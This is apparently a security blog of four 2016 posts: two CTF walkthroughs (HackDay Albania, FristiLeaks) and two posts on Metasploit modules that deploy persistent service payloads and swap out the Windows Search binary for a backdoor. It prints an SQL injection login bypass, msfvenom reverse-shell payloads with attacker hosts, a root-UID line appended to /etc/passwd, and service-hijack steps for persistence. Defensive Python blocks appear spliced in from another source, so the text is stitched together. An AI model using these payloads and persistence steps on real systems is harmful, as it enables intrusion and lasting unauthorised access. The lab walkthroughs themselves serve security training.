Monday 5 December 2016

CTF HackDay: Albania - WalkThrough

Hey Readers,
So here I'm up with another CTF I've recently solved. It was kinda tricky (unexpectedly). But after irritating seniors with my problems related to it, I finally managed to solve it all :P

Download > https://www.vulnhub.com/entry/hackday-albania,167/


So first things first: determining the target. I scanned the network for live devices. (Our target was the host with IP "192.168.0.107".)

Alright, I did an intense scan on our target, scanning the port range 0-10000, and finally ended up with 2 open ports: 8008 (Apache server) and 22 (SSH). I also got some directories.

$ sudo nmap -T4 -A -v -p 0-10000 192.168.0.107


Dirs I got:

/rkfpuzrahngvat/
/slgqvasbiohwbu/
/tmhrwbtcjpixcv/
/vojtydvelrkzex/
/wpkuzewfmslafy/
/xqlvafxgntmbgz/
/yrmwbgyhouncha/
/zsnxchzipvodib/
/atoydiajqwpejc/
/bupzejbkrxqfkd/
/cvqafkclsyrgle/
/unisxcudkqjydw/
/dwrbgldmtzshmf/
/exschmenuating/
/fytdinfovbujoh/
/gzuejogpwcvkpi/
/havfkphqxdwlqj/
/ibwglqiryexmrk/
/jcxhmrjszfynsl/
/kdyinsktagzotm/
/lezjotlubhapun/
/mfakpumvcibqvo/
/ngblqvnwdjcrwp/
/ohcmrwoxekdsxq/
/pidnsxpyfletyr/
/qjeotyqzgmfuzs/

I then opened "192.168.0.107:8008", where Apache was running, and was prompted with a message box "Ne qofte se jam UNE, e di se ku te shkoj" > Translated > "If I am, I know where to go".



I started visiting each dir and ended up with a meme :/


But then I found the directory named "unisxcudkqjydw", which had a slightly different page asking me to redirect to "/unisxcudkqjydw/vulnbank/" with the message "IS there any /vulnbank/ in there ???". I visited that link and got a login page of some "Vuln Bank".


I tried some random combinations for auth bypass, but unfortunately none of them worked, except one:

Username : " '
Password : " '

I was prompted with an SQL error. I thought it was my lucky shot :P and tried sqlmap and various other SQLi tools, but the result was negative :/


Finally I downloaded a username and password list and ran it through hydra. LOL, my luck really worked (I don't use hydra and hate brute-force attacks :/ :P).
I got a working combination:

Username : ' or 'a' = 'a' --
Password : #
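Why this pair works, as an added example that is not the Vuln Bank application's code: a login lookup built by string concatenation next to the parameterised form it should have used, run against a constructed in-memory SQLite table with one assumed `admin` row.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the bank's user table (not the CTF's schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    return con


def login_vulnerable(con, username, password):
    """Interpolates the form fields straight into SQL.

    The username  ' or 'a' = 'a' --  turns the WHERE clause into
    username = '' or 'a' = 'a'  and comments out the password check;
    a lone quote leaves the string unterminated, which is the SQL error
    the post saw first.
    """
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return con.execute(sql).fetchone() is not None


def login_fixed(con, username, password):
    """Binds the fields as parameters; quotes and '--' stay literal text."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone() is not None


def raises_sql_error(login, con, username, password):
    """True when the login routine fails with a database error on this input."""
    try:
        login(con, username, password)
        return False
    except sqlite3.Error:
        return True


if __name__ == "__main__":
    db = make_db()
    bypass = ("' or 'a' = 'a' --", "#")
    print("vulnerable login:", login_vulnerable(db, *bypass))   # True
    print("fixed login:     ", login_fixed(db, *bypass))        # False
    print("quote probe errors:", raises_sql_error(login_vulnerable, db, "\" '", "\" '"))
```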


Okay!! So I was finally seeing some hope of solving it :).

I tried uploading PHP files directly, but that didn't work. I immediately generated a PHP backdoor via msfvenom and renamed it with the extension ".php.jpg". I opened a handler and executed the payload by visiting the link where it was saved.


Then I just got a bash shell with the command:

$ /usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'


I then checked all files and directories carefully to see if I could find some hint, but everything was useless. I thought config.php would work. I opened it and got the user and pass for MySQL with root credentials; I thought they could be the same credentials for the root user login too, but the result was negative.

After getting literally cooked up :P I checked for writable dirs on the machine with the command:

$ find / -writable -type f 2>/dev/null

LOL, I noticed /etc/passwd was writable :P Bingo!! There I struck on an idea... "what if I manually add another user to the passwd file?" (Reference which helped me).

I then generated a password hash using openssl.

Username : dope
Password : dope


Now I just went back to meterpreter, opened and edited /etc/passwd with the "edit" option, added the new user at the bottom, and saved the file.

dope:$1$MamNpKxX$/zIJhc75C0O9zRrTxxGYB/:0:0:test:/root:/bin/bash
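What a defender should check for after this step, as an added example that is not part of the post: it flags a passwd file writable by non-root users, any extra UID 0 account, and a hash stored in passwd itself instead of in shadow. The sample file is constructed around the line above.

```python
import os
import stat
import tempfile

# Values that mean "password lives in /etc/shadow" or "account is locked".
PLACEHOLDERS = {"x", "*", "!", "!!"}


def audit_passwd_lines(lines):
    """Return findings for the given /etc/passwd entries."""
    findings = []
    for n, line in enumerate(lines, 1):
        line = line.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            findings.append(f"line {n}: malformed entry {line!r}")
            continue
        user, pw, uid, _gid, _gecos, _home, shell = parts
        if uid == "0" and user != "root":
            findings.append(f"line {n}: extra UID 0 account {user!r} with shell {shell}")
        if pw not in PLACEHOLDERS:  # a real hash (or nothing) sits in passwd, not shadow
            findings.append(f"line {n}: password field for {user!r} is not a shadow placeholder")
    return findings


def audit_passwd_file(path="/etc/passwd"):
    """Audit the file mode (the walkthrough's entry point), then its entries."""
    findings = []
    mode = os.stat(path).st_mode
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path} is writable by group/others (mode {stat.S_IMODE(mode):04o})")
    with open(path) as fh:
        findings.extend(audit_passwd_lines(fh))
    return findings


# Constructed sample: a normal file plus the line the walkthrough appended.
SAMPLE = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    "dope:$1$MamNpKxX$/zIJhc75C0O9zRrTxxGYB/:0:0:test:/root:/bin/bash\n"
)


def demo():
    """Write the sample with the loose mode that `find / -writable` turned up and audit it."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "passwd")
        with open(path, "w") as fh:
            fh.write(SAMPLE)
        os.chmod(path, 0o666)
        return audit_passwd_file(path)
```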

The edited /etc/passwd looked like this:


Here I started to feel I would be escalated to root privileges soon.

And finally, I ran the command "su", entered the password for the user I had just made, and Boom!! It worked :P Finally I captured the flag :D

$ su dope
$ id
$ cd /root && cat flag.txt


Special Thanks to: VulnHub :) <3
Follow me on twitter : https://twitter.com/Indi_g34r

Sunday 13 November 2016

deploy_service_payload - Post MSF module For Deploy A Persistence Service Payload

[What Does This Module Do?] 
deploy_service_payload.rb uploads your payload.exe to target system (DEPLOY_PATH) and creates a service pointing to it (SERVICE_NAME). 

The service will auto-start with Windows with LocalSystem privileges. Rebooting the system or restarting the service will run the malicious executable with elevated privileges. WARNING: this module only supports uploading .exe executables.

[NOTE]

BUILD SERVICE PAYLOAD:
$ sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<Attacker Port> -a x86 --platform windows -f exe-service -o Program.exe

--WARNING: This module will not delete the deployed payload.
--WARNING: Only executables explicitly written to interface with the Service Control Manager should be installed this way (that is what the exe-service format above produces). While SC will happily accept a regular non-service binary, you will receive the fatal Error 1053 when you attempt to start the service. Please read the following article: How to Run Any Program as a Background Service in Windows

[INFO]



[INSTALLATION]

1* Download Module from {HERE}
2* Copy the ruby file to
/{path}/metasploit-framework/modules/post/windows/manage/
3* Open msfconsole and issue command "reload_all" to reload paths.
4* use post/windows/manage/deploy_service_payload

[ADVANCED OPTIONS]



[USAGE]

NOTE: In the following example we are going to deploy a netcat executable from the attacker machine (using netcat [nc.exe] is not mandatory; by default the module deploys a built-in service executable).

To deploy a netcat client we need to set the module options 'USE_NETCAT' | 'NC_LHOST' | 'NC_LPORT' and manually start a netcat listener to receive the remote service connection.


-- DEPLOYING PAYLOAD :

1* set USE_NETCAT true
2* set NC_LPORT 31337
3* set NC_LHOST 192.168.0.100
4* set DEPLOY_PATH {deployment path in victim box}
5* set LOCAL_PATH /home/{user}/Desktop/nc.exe {executable to be uploaded}
6* set PAYLOAD_NAME nc.exe
7* set SERVICE_NAME infection
8* set SESSION 1

{Opening a netcat listener on the desired port to receive the remote service connection}

$ sudo nc -lvp 31337

Expected Results :  


-- HIDING PAYLOAD :

1* set HIDDEN_ATTRIB true
2* set DEPLOY_PATH {deployment path in victim box}
3* set PAYLOAD_NAME nc.exe
4* set SESSION 1

Expected Results :


-- CHECKING SERVICE STATUS :

1* set SERVICE_STATUS true
2* set SERVICE_NAME infection
3* set SESSION 1

Expected Results :


-- DELETING REMOTE SERVICE :

1* set DEL_SERVICE true
2* set SERVICE_NAME infection
3* set SESSION 1
--WARNING: This module will not delete the deployed payload.
Expected Results :


[VIDEO DEMO]




[Credits]

Module Author: pedr0 Ubuntu [r00t-3xp10it]
Special Thanks: Fatima Ferreira | Chaitanya



Sunday 30 October 2016

WSearch - Privilege Escalation via Weak Service Permissions (MSF Module)

Hi guys!!
So, after almost a week full of hard work, we finally made another post module for Windows privilege escalation, following MSI_privilege_escalation.

[What is WSearch ?]

SearchIndexer.exe is the Windows service that handles indexing of your files for Windows Search, which fuels the file search engine built into Windows that powers everything from the Start Menu search box to Windows Explorer, and even the Libraries feature.  --Wikipedia

[INFO]

--Vendor : Microsoft WSearch (windows indexing) service [SearchIndexer.exe]
--Vulnerability Type : Persistence backdooring + Privilege Escalation
--Versions Affected : Windows XP, VISTA, 7, 8, 9, 10
--Severity : critical

--Description:
The WSearch service uses one executable set in BINARY_PATH_NAME and runs it as LocalSystem at startup; this enables local privilege escalation / persistence backdooring. To exploit this, a local attacker needs to replace the executable at the service's BINARY_PATH_NAME. Rebooting the system or restarting the service will run the malicious executable with elevated privileges.

[What factors are affecting privilege escalation on windows with the help of this application ?]


                                                                     

We ran the command "sc query WSearch" and saw that its state is always RUNNING.
From this we can conclude that a backdoor replacing the original process (WSearch) would execute all the time while the system still appears normal, which gives persistence.



We can see that the application runs with NT AUTHORITY privileges, so we can make it persist with Administrator's privileges.



And finally, we can observe that the application's START_TYPE is set to AUTO_START, which means the process will start right after boot. We can also observe that the executable at BINARY_PATH_NAME can be replaced, so a backdoor saved under the application's own name, SearchIndexer.exe, takes its place.

Having put all these observations together, we can now build a Metasploit post module for privilege escalation.
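A baseline check that covers this service and the deploy_service_payload case above, added here and not part of either module: it parses `sc qc`-style output (constructed samples in the usual `KEY : value` layout) and flags a service missing from the baseline, a changed BINARY_PATH_NAME, a changed start account, or a binary whose SHA-256 no longer matches, which is how a swapped SearchIndexer.exe shows up. The `resolve` callback maps a Windows path to a local file so the hash comparison runs anywhere.

```python
import hashlib, re, tempfile
from pathlib import Path

FIELD_RE = re.compile(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$")

def parse_sc_qc(text):
    """Return the KEY: value fields of one `sc qc <name>` output block."""
    return {m.group(1): m.group(2) for m in map(FIELD_RE.match, text.splitlines()) if m}

def binary_of(path_name):
    """Strip service arguments (e.g. '/Embedding') and surrounding quotes."""
    p = path_name.strip()
    return p[1:p.index('"', 1)] if p.startswith('"') else p.split(" ")[0]

def audit_service(sc_output, baseline, resolve):
    """Compare one service with the baseline; `resolve` maps a Windows path to a local file."""
    f = parse_sc_qc(sc_output)
    name = f.get("SERVICE_NAME", "?")
    if name not in baseline:  # e.g. a freshly created service pointing at an uploaded exe
        return [f"{name}: not in baseline, runs {f.get('BINARY_PATH_NAME')} as {f.get('SERVICE_START_NAME')}"]
    want, findings = baseline[name], []
    exe = binary_of(f.get("BINARY_PATH_NAME", ""))
    if exe.lower() != want["path"].lower():
        findings.append(f"{name}: binary path changed to {exe}")
    if f.get("SERVICE_START_NAME") != want["account"]:
        findings.append(f"{name}: start account changed to {f.get('SERVICE_START_NAME')}")
    if hashlib.sha256(Path(resolve(exe)).read_bytes()).hexdigest() != want["sha256"]:
        findings.append(f"{name}: binary on disk does not match baseline hash")
    return findings

# Constructed `sc qc` output: the indexer after a binary swap, plus a new service.
SC_WSEARCH = """SERVICE_NAME: WSearch
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\\Windows\\system32\\SearchIndexer.exe /Embedding
        SERVICE_START_NAME : LocalSystem
"""
SC_NETCAT = """SERVICE_NAME: infection
        BINARY_PATH_NAME   : C:\\Users\\Public\\nc.exe
        SERVICE_START_NAME : LocalSystem
"""

def demo():
    """Baseline the genuine indexer, swap it on disk, then audit both services."""
    with tempfile.TemporaryDirectory() as d:
        exe = Path(d) / "SearchIndexer.exe"
        exe.write_bytes(b"constructed genuine indexer")
        baseline = {"WSearch": {"path": "C:\\Windows\\system32\\SearchIndexer.exe", "account": "LocalSystem",
                                "sha256": hashlib.sha256(exe.read_bytes()).hexdigest()}}
        exe.write_bytes(b"constructed replacement")  # the swap described above
        return [r for sc in (SC_WSEARCH, SC_NETCAT) for r in audit_service(sc, baseline, lambda _p: exe)]
```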



[Advanced Options]



[Proof Of Concept]

--Installation Steps : 

  1. Download module from [ here ] & copy persist_priv_Wsearch.rb to
     ../{path}/metasploit-framework/modules/post/windows/escalate/persist_priv_Wsearch.rb
  2. open msfconsole and execute command "reload_all"

-- Exploitation Steps :

1. Get a meterpreter session somehow
2. use post/windows/escalate/persist_priv_Wsearch
3. Rename your backdoor to "SearchIndexer.exe"
4. set UPLOAD_PATH <path to backdoor.exe>
5. set session <session_id> 
6. exploit

 Expected Results : 


-- Reverting Everything To Normal : 

1. set DELETE_PERSISTENCE true
2. set session <session_id>
3. exploit

  Expected Results :



-- Checking Service Settings :

1. set SERVICE_STATUS true
2. exploit

    Expected Results : 



--[Credits] : Pedro Ubuntu [r00t 3xp10it]  | milton_barra | Chaitanya Haritash

Saturday 15 October 2016

CTF FristiLeaks: 1.3 - Walkthrough

I generally don't solve CTFs, but after viewing a walkthrough by one of my close friends I thought even I must give it a try :P (yeah, these days I had less work compared to the past few weeks and I watched too many movies ;_;).

So, I thought I'd try FristiLeaks 1.3. Yeah, in the beginning it was a bit puzzling, but then I started getting ideas about the further challenges one after another.


So first things first, let's scan for live hosts in our network and grab the open ports of the target host.


$ nmap -sn 192.168.0.0/24


$ nmap -T4 -A -v 192.168.0.100


OK! So I got port 80 open here with 3 disallowed entries: /cola, /sisi, /beer. Nice, let's check them.


Our main page; let's check cola, sisi, beer :D


Damn!! I got nothing except this meme :/ So here I tried some random links and finally found something on /fristi :D and yeah, it was a login page!!


Here I began checking the page source and found some encrypted info; my guess was that it was base64.




Here I scrolled up a bit and found an image being decoded; I decided to replace the encrypted code of the image with the base64 I found apart from the whole code.


Bingo!! After decoding the base64 I got some weird text "keKKeKKeKkEkkEk". LOL, easy guess: "PASSWORD" :V. I then started searching for a username, and the one thing which caught my attention the most was a note inside the page source.


"TODO:
 We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz
"

Now nothing here looked suspicious except the name of the one who left this comment: "eezeepz".

I decided to make a combination like:

username : eezeepz
password : keKKeKKeKkEkkEk

and got access successfully :D wew!!

Next, I found the only option was to upload files in image format (I tried it directly with .php format and that didn't work).

So I generated a PHP payload via msfvenom and changed its extension to .php.png:

$ sudo msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f raw
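The server-side check that would have rejected this `.php.png` upload and the `.php.jpg` one in the HackDay post, as an added example that is neither CTF's upload handler: every dotted segment of the name must be an image extension (Apache's mod_mime can map any segment to a handler, not just the last one), the content must start with that type's magic bytes, and the stored name is chosen by the server. Sample inputs are constructed.

```python
import os
import secrets

# Allowed image types and the bytes a genuine file of that type starts with.
IMAGE_MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def check_upload(filename, data):
    """Return (accepted, reason) for a client-supplied name and its content."""
    base = os.path.basename(filename.replace("\\", "/"))
    segments = base.lower().split(".")
    if len(segments) < 2 or not segments[0]:
        return False, "no usable extension"  # also rejects dotfiles like .htaccess
    # Every segment after the stem is treated as an extension, so
    # "shell.php.jpg" fails on "php" even though it ends in ".jpg".
    for ext in segments[1:]:
        if ext not in IMAGE_MAGIC:
            return False, f"disallowed extension segment .{ext}"
    if not data.startswith(IMAGE_MAGIC[segments[-1]]):
        return False, "content does not match the declared image type"
    return True, "ok"


def stored_name(filename):
    """Server-chosen filename: random stem plus the single validated extension."""
    ext = filename.lower().rsplit(".", 1)[-1]
    return f"{secrets.token_hex(8)}.{ext}"


def handle_upload(filename, data):
    """Validate, then return (name to save under or None, reason)."""
    ok, reason = check_upload(filename, data)
    return (stored_name(filename) if ok else None), reason
```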


lol meterpreter I love u :P





Let's try to gain access to a bash shell :D


Let's check the users in the home dir.


OK, so there are 3 users, of which I have permission to access the "eezeepz" user's directory.


I did "ls -la" to list all the directory contents with their respective permissions. There were so many files which looked like commands from /usr/bin, but one file attracted my attention: a txt file named "notes.txt", so I decided to "cat notes.txt" to open it, and I found hints for the next challenge.



OK, so as it simply says, I have the privilege to use commands like chmod, df, cat, echo, ps, grep, egrep,
and if I execute any of them by putting them in a file "runthis" in the /tmp dir, I'll have my results delivered to a file named "cronresult". LOL, no guessing: it was clear that user admin is the path to the other user and eventually to root. "chmod 777 admin -R"

I decided to change the permissions of user admin's dir, as I had the privilege to use the "chmod" command. I executed the following set of commands and got a positive result as expected :P

$ echo "/usr/bin/../../bin/chmod -R 777 /home/admin" > /tmp/runthis
$ ls -lah /home
$ ls -alh /home/admin
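The same setup seen from the defender's side, as an added example not taken from the CTF: it parses crontab lines and flags jobs whose command reads a file that any user can create, such as runthis in /tmp. The crontab line and directory layout are constructed to mirror the notes.txt description.

```python
import os
import stat
import tempfile

def parse_crontab(text):
    """Yield (user, command) for each job line of an /etc/cron.d-style crontab."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment or VAR=value line
        n = 2 if line.startswith("@") else 6  # "@reboot user cmd" or "m h dom mon dow user cmd"
        parts = line.split(None, n)
        if len(parts) == n + 1:
            yield parts[-2], parts[-1]

def weak_paths(command):
    """Paths in `command` that a non-root user could create or modify."""
    weak = []
    for tok in command.split():
        if not tok.startswith("/"):
            continue
        try:
            dmode = os.stat(os.path.dirname(tok)).st_mode
        except FileNotFoundError:
            continue
        if dmode & stat.S_IWOTH:  # anyone can plant the file here, sticky bit or not
            weak.append(f"{tok}: parent directory is world-writable")
            continue
        try:
            st = os.stat(tok)
        except FileNotFoundError:
            continue
        if st.st_uid != 0 or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            weak.append(f"{tok}: file is owned or writable by a non-root user")
    return weak

def audit_crontab(text):
    """Return findings for jobs whose inputs a low-privileged user controls."""
    return [f"job for {user!r}: {w}" for user, cmd in parse_crontab(text) for w in weak_paths(cmd)]

def demo():
    """Constructed layout: a job run as admin executes whatever sits in a world-writable tmp dir."""
    with tempfile.TemporaryDirectory() as root:
        tmp = os.path.join(root, "tmp")
        os.mkdir(tmp)
        os.chmod(tmp, 0o1777)  # like the real /tmp: world-writable with the sticky bit
        home = os.path.join(root, "home", "admin")
        os.makedirs(home)
        os.chmod(home, 0o755)
        return audit_crontab(f"* * * * * admin /bin/sh {tmp}/runthis > {home}/cronresult\n")
```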

I found some suspicious text files which could be a hint for the next challenge.

-- whoisyourgodnow.txt
-- cryptedpass.txt
-- cryptpass.py

2 files had some encrypted text, of which one was in base64 and the other was some random text (as far as I could guess), and the 3rd one was a Python file to decode those passwords. I decided to decode one of them, and thought I'd start with the base64 one.



So it was a password (I guessed so, because the password for the admin panel was also disclosed in the same manner).

I decided to try it for fristigod, and logged in successfully :)


After owning the fristigod user I came one step closer to root :D


So I was in the dir /var/fristigod, as I unfortunately didn't find any hint in /home/fristigod/. There I noticed some hidden files; one of them was .bash_history. I decided to open it and found a set of commands recorded in that file, as if whoever had been there before me had used them, so I thought to give them a try ( 3:) evil mind)

$ cat .bash_history 

"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom 
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom 
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""


hmm ... 

Okay!! Now I was a bit tired and decided to do "sudo -l" to get the $PATH


"/var/fristigod/.secret_admin_stuff/doCom" its was a clear hint that this file have some privilege to change permissions or to do some tasks from root's permission , cos its owned by root.

I decided to execute this file "doCom":

$ ./.secret_admin_stuff/doCom

and was prompted with the result:

"Nice try , But wrong user ;)"

There I decided to use "sudo" with the argument "-u":

$ sudo -u fristi ./.secret_admin_stuff/doCom

Again I got a hint about the usage of this file:

"Usage: ./program_name terminal_command ..."

lol, here I got the idea that this file will elevate the privileges of a program of our choice :P I decided to go with /bin/bash; after all, who the hell doesn't want /bin/bash to have full privileges? ( 3:D evil mind)

$ sudo -u fristi ./.secret_admin_stuff/doCom /bin/bash

Voila!!






Thx Aaditya Purani :D for being an inspiration bro :D post dedicated to u bro ^_^

=> Walkthrough to Billy Madison 1.1 By Aaditya Purani

---------

Okay!! So here I end this post :) Hope you like it :)